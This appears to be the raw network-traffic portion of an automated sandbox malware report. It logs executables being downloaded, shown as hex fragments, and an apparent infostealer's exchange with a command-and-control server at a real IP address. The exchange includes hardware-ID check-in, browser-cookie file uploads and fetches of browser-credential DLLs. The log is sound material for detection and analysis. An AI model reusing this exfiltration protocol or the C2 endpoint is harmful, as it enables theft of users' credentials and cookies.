00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 02 Nov 2024 16:57:02 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 02 Nov 2024 16:57:03 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 02 Nov 2024 16:57:07 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 01 Nov 2024 13:21:33 GMTETag: "1aa00-625d9d04b7140"Accept-Ranges: bytesContent-Length: 109056Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 88 e9 26 88 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 32 01 00 00 76 00 00 00 00 00 00 9e 51 01 00 00 20 00 00 00 60 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 02 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 51 01 00 4f 00 00 00 00 60 01 00 20 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 0c 00 00 00 9c 50 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 31 01 00 00 20 00 00 00 32 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 73 00 00 00 60 01 00 00 74 00 00 00 34 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 01 00 00 02 00 00 00 a8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 51 01 00 00 00 00 00 48 00 00 00 02 00 05 00 64 30 00 00 b0 39 00 00 03 00 02 00 08 00 00 06 14 6a 00 00 88 e6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 03 20 34 02 00 00 14 14 04 28 16 00 00 0a 2a 32 03 04 16 14 14 05 6f 17 00 00 0a 2a 3a 03 04 05 16 14 14 0e 04 6f 18 00 00 0a 2a 13 30 09 00 2c 00 00 00 00 00 00 00 04 6f 19 00 00 0a 72 01 00 00 70 20 24 01 00 00 14 04 18 8d 16 00 00 01 25 16 03 a2 25 17 05 a2 14 6f 1a 00 00 0a 74 1a 00 00 01 2a 26 03 04 05 6f 1b 00 00 0a 2a 1e 02 28 1c 00 00 0a 2a 4a 02 72 21 00 00 70 18 73 1d 00 00 0a 28 1e 00 00 0a 2a 4a 73 09 00 00 06 25 6f 07 00 00 06 6f 1f 00 00 0a 26 2a 1e 02 28 20 00 00 0a 2a 36 02 28 21 00 00 0a 02 28 0b 00 00 06 2a 00 00 13 30 02 00 24 00 00 00 01 00 00 11 02 7b 02 00 00 04 2c 01 2a 02 17 7d 02 00 00 04 72 4b 00 00 70 18 73 1d 00 00 0a 0a 02 06 28 22 00 00 0a 2a 66 03 17 33 0d 02 04 74 04 00 00 02 7d 01 00 00 04 2a 02 17 7d 02 00 00 04 2a 1e 02 28 23 00 00 0a 2a ae 7e 03 00 00 04 2d 1e 72 a3 00 00 70 d0 05 00 00 02 28 24 00 00 0a 6f 25 00 00 0a 73 26 00 00 0a 80 03 00 00 04 7e 03 00 00 04 2a 1a 7e 04 00 00 04 2a 1e 02 80 04 00 00 04 2a 1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.163Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c882d91d1df1bdb3.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHCAKKEGCAAFHJJJDBKJHost: 62.204.41.163Content-Length: 220Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 38 41 43 39 37 33 45 38 34 35 39 32 33 39 38 39 38 39 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 4a 2d 2d 0d 0a Data Ascii: ------GHCAKKEGCAAFHJJJDBKJContent-Disposition: form-data; name="hwid"78AC973E84592398989009------GHCAKKEGCAAFHJJJDBKJContent-Disposition: form-data; name="build"default10_cap------GHCAKKEGCAAFHJJJDBKJ--
Source: global traffic	HTTP traffic detected: POST /c882d91d1df1bdb3.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAKKFHJDBKKEBFHDAAEHost: 62.204.41.163Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 4b 4b 46 48 4a 44 42 4b 4b 45 42 46 48 44 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 63 39 65 33 35 38 33 33 33 33 35 66 38 38 33 62 38 30 31 39 37 35 65 63 30 63 64 39 36 38 65 30 32 61 63 37 37 36 66 37 31 36 35 64 66 35 30 36 63 38 34 64 61 34 32 61 36 61 63 64 31 61 38 65 33 38 37 64 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 4b 4b 46 48 4a 44 42 4b 4b 45 42 46 48 44 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 4b 4b 46 48 4a 44 42 4b 4b 45 42 46 48 44 41 41 45 2d 2d 0d 0a Data Ascii: ------EBAKKFHJDBKKEBFHDAAEContent-Disposition: form-data; name="token"3c9e35833335f883b801975ec0cd968e02ac776f7165df506c84da42a6acd1a8e387ddb3------EBAKKFHJDBKKEBFHDAAEContent-Disposition: form-data; name="message"browsers------EBAKKFHJDBKKEBFHDAAE--
Source: global traffic	HTTP traffic detected: POST /c882d91d1df1bdb3.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIJEHJDHJKECBFHDHDHHost: 62.204.41.163Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 49 4a 45 48 4a 44 48 4a 4b 45 43 42 46 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 63 39 65 33 35 38 33 33 33 33 35 66 38 38 33 62 38 30 31 39 37 35 65 63 30 63 64 39 36 38 65 30 32 61 63 37 37 36 66 37 31 36 35 64 66 35 30 36 63 38 34 64 61 34 32 61 36 61 63 64 31 61 38 65 33 38 37 64 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 45 48 4a 44 48 4a 4b 45 43 42 46 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 45 48 4a 44 48 4a 4b 45 43 42 46 48 44 48 44 48 2d 2d 0d 0a Data Ascii: ------DHIJEHJDHJKECBFHDHDHContent-Disposition: form-data; name="token"3c9e35833335f883b801975ec0cd968e02ac776f7165df506c84da42a6acd1a8e387ddb3------DHIJEHJDHJKECBFHDHDHContent-Disposition: form-data; name="message"plugins------DHIJEHJDHJKECBFHDHDH--
Source: global traffic	HTTP traffic detected: POST /c882d91d1df1bdb3.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEHJEHDBGHIDGDGHCBGHost: 62.204.41.163Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 45 48 44 42 47 48 49 44 47 44 47 48 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 63 39 65 33 35 38 33 33 33 33 35 66 38 38 33 62 38 30 31 39 37 35 65 63 30 63 64 39 36 38 65 30 32 61 63 37 37 36 66 37 31 36 35 64 66 35 30 36 63 38 34 64 61 34 32 61 36 61 63 64 31 61 38 65 33 38 37 64 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 45 48 44 42 47 48 49 44 47 44 47 48 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 45 48 44 42 47 48 49 44 47 44 47 48 43 42 47 2d 2d 0d 0a Data Ascii: ------IIEHJEHDBGHIDGDGHCBGContent-Disposition: form-data; name="token"3c9e35833335f883b801975ec0cd968e02ac776f7165df506c84da42a6acd1a8e387ddb3------IIEHJEHDBGHIDGDGHCBGContent-Disposition: form-data; name="message"fplugins------IIEHJEHDBGHIDGDGHCBG--
Source: global traffic	HTTP traffic detected: POST /c882d91d1df1bdb3.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHJKJKKKJJJKJKFHJJJJHost: 62.204.41.163Content-Length: 6599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1d1758bf3d6d1a39/sqlite3.dll HTTP/1.1Host: 62.204.41.163Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c882d91d1df1bdb3.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFHJJDHJEGHJKECBGCFHHost: 62.204.41.163Content-Length: 427Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 63 39 65 33 35 38 33 33 33 33 35 66 38 38 33 62 38 30 31 39 37 35 65 63 30 63 64 39 36 38 65 30 32 61 63 37 37 36 66 37 31 36 35 64 66 35 30 36 63 38 34 64 61 34 32 61 36 61 63 64 31 61 38 65 33 38 37 64 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 2d 2d 0d 0a Data Ascii: ------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="token"3c9e35833335f883b801975ec0cd968e02ac776f7165df506c84da42a6acd1a8e387ddb3------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------KFHJJDHJEGHJKECBGCFH--
Source: global traffic	HTTP traffic detected: POST /c882d91d1df1bdb3.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHIIIIEHCFIECAKFHJDHost: 62.204.41.163Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 49 49 49 45 48 43 46 49 45 43 41 4b 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 63 39 65 33 35 38 33 33 33 33 35 66 38 38 33 62 38 30 31 39 37 35 65 63 30 63 64 39 36 38 65 30 32 61 63 37 37 36 66 37 31 36 35 64 66 35 30 36 63 38 34 64 61 34 32 61 36 61 63 64 31 61 38 65 33 38 37 64 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 49 49 49 45 48 43 46 49 45 43 41 4b 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 49 49 49 45 48 43 46 49 45 43 41 4b 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 49 49 49 45 48 43 46 49 45 43 41 4b 46 48 4a 44 2d 2d 0d 0a Data Ascii: ------GDHIIIIEHCFIECAKFHJDContent-Disposition: form-data; name="token"3c9e35833335f883b801975ec0cd968e02ac776f7165df506c84da42a6acd1a8e387ddb3------GDHIIIIEHCFIECAKFHJDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GDHIIIIEHCFIECAKFHJDContent-Disposition: form-data; name="file"------GDHIIIIEHCFIECAKFHJD--
Source: global traffic	HTTP traffic detected: POST /c882d91d1df1bdb3.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKKFHIEGDHJKECAAKKEHost: 62.204.41.163Content-Length: 4635Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c882d91d1df1bdb3.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFCGDBAKKKFBGDHJKFHJHost: 62.204.41.163Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 63 39 65 33 35 38 33 33 33 33 35 66 38 38 33 62 38 30 31 39 37 35 65 63 30 63 64 39 36 38 65 30 32 61 63 37 37 36 66 37 31 36 35 64 66 35 30 36 63 38 34 64 61 34 32 61 36 61 63 64 31 61 38 65 33 38 37 64 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 2d 2d 0d 0a Data Ascii: ------KFCGDBAKKKFBGDHJKFHJContent-Disposition: form-data; name="token"3c9e35833335f883b801975ec0cd968e02ac776f7165df506c84da42a6acd1a8e387ddb3------KFCGDBAKKKFBGDHJKFHJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KFCGDBAKKKFBGDHJKFHJContent-Disposition: form-data; name="file"------KFCGDBAKKKFBGDHJKFHJ--
Source: global traffic	HTTP traffic detected: GET /1d1758bf3d6d1a39/freebl3.dll HTTP/1.1Host: 62.204.41.163Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1d1758bf3d6d1a39/mozglue.dll HTTP/1.1Host: 62.204.41.163Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1d1758bf3d6d1a39/msvcp140.dll HTTP/1.1Host: 62.204.41.163Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1d1758bf3d6d1a39/nss3.dll HTTP/1.1Host: 62.204.41.163Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1d1758bf3d6d1a39/softokn3.dll HTTP/1.1Host: 62.204.41.163Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1d1758bf3d6d1a39/vcruntime140.dll HTTP/1.1Host: 62.204.41.163Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c882d91d1df1bdb3.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBFBKKJECAKEHJJJDBAFHost: 62.204.41.163Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
